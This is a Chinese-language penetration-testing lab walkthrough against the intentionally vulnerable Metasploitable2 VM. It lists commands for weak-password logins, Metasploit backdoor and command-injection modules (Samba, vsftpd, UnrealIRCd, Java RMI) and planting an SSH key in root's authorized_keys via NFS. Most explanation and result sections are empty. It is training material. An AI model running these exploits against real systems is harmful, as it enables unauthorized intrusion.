本文共 2403 字,大约阅读时间需要 8 分钟。
##靶机信息靶机:Metasploitable2-Linux
IP:192.168.160.131##攻击演示系统操作系统:Kali Linux 1.0.9
##漏洞一:弱密码漏洞
###漏洞分析
###攻击步骤
telnet 192.168.160.131
###测试结果
###注意事项
##漏洞二:MySQL弱密码漏洞
###漏洞分析
###攻击步骤
mysql -h 192.168.160.131 -u root
###测试结果
##漏洞三:PostgreSQL弱密码漏洞
###漏洞分析
###攻击步骤
psql -h 192.168.160.131 -U postgres
###测试结果
##漏洞四:VNC弱密码漏洞
###漏洞分析
###攻击步骤
vncviewer 192.168.160.131
###测试结果
##漏洞五:Samba MS-RPC Shell命令注入漏洞
###漏洞分析
###攻击步骤
msfconsole
use exploit/multi/samba/usermap_script
set RHOST 192.168.160.131
exploit
###测试结果
uname -a验证系统信息。##漏洞六:Vsftpd源码包后门漏洞
###漏洞分析
###攻击步骤
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST 192.168.160.131
run
###测试结果
##漏洞七:UnreallRCd后门漏洞
###漏洞分析
###攻击步骤
msfconsole
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOST 192.168.160.131
run
###测试结果
##漏洞八:Linux NFS共享目录配置漏洞
###漏洞分析
/root/.ssh/authorized_keys,实现无密码登录。###攻击步骤
rpcinfo -p 192.168.160.131
showmount -e 192.168.160.131
ssh-keygen
cat /root/.ssh/id_rsa.pub > /tmp/t00l/root/.ssh/authorized_keys
###测试结果
##漏洞九:Java RMI SERVER命令执行漏洞
###漏洞分析
###攻击步骤
nmap -p 1099 192.168.160.131
use exploit/multi/misc/java_rmi_server
set RHOST 192.168.160.131
run
###测试结果
##漏洞十:Tomcat管理台默认口令漏洞
###漏洞分析
###攻击步骤
http://192.168.160.131:8180
###测试结果
通过以上步骤,可以对靶机进行多种攻击方式,测试系统的安全性。
转载地址:http://yxwj.baihongyu.com/